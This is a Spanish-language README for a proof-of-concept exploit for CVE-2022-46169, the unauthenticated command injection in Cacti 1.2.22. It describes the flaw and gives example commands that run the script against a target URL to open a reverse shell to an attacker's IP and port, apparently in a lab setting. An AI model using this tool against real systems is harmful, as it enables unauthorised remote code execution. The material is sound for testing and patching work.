
PoC para CVE-2022-46169 que afecta a Cacti versión 1.2.22
Este es un script de Prueba de Concepto (POC) para la vulnerabilidad CVE-2022-46169 que afecta a Cacti versión 1.2.22.
La vulnerabilidad CVE-2022-46169 permite una inyección de comandos sin autenticación en versiones de Cacti hasta la 1.2.22, logrando así una ejecución remota de código sin autenticación como el usuario www-data. La vulnerabilidad es causada por una validación incorrecta de la entrada del usuario en el parámetro "host_id" del archivo "remote_agent.php".
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
Reemplace <TARGET_URL> con la URL de la instalación de Cacti objetivo, <YOUR_IP> con la dirección IP de la máquina donde desea recibir la reverse shell, y <YOUR_PORT> con el número de puerto donde desea recibir la reverse shell.
Ejemplo:
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
Este script POC es solo para fines educativos. Úselo bajo su propio riesgo. El autor de este script no es responsable de ningún daño causado por el uso del mismo.
CVE-2022-46169 - Entrada CVE de la vulnerabilidad.
Advertencias de seguridad de Cacti en Github